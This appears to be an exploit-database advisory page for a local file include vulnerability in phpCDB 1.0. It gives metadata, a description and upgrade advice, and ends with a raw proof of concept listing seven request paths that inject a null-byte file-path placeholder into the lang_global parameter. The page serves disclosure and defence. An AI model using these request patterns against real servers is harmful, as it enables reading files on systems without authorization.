phpCDB - exploit.company

vendor:

phpCDB

by:

cr4wl3r

7,5

CVSS

HIGH

Local File Include

CWE

Product Name: phpCDB

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:phpcdb:phpcdb

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpCDB <= 1.0 Local File Include Vulnerability

phpCDB version 1.0 and below is vulnerable to a Local File Include vulnerability. This vulnerability allows an attacker to include a file from the local system or a remote system. The vulnerable parameters are lang_global in the following files: firstvisit.php, newfolder.php, showfolders.php, newlang.php, showinnerfolder.php, writecode.php, and showcode.php. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the lang_global parameter.

Mitigation:

Upgrade to the latest version of phpCDB.

Source

Exploit-DB raw data:

##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
 [phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
 [phpcdb_path]/newfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/showfolders.php?lang_global=[LFI%00]
 [phpcdb_path]/newlang.php?lang_global=[LFI%00]
 [phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/writecode.php?lang_global=[LFI%00]
 [phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################txt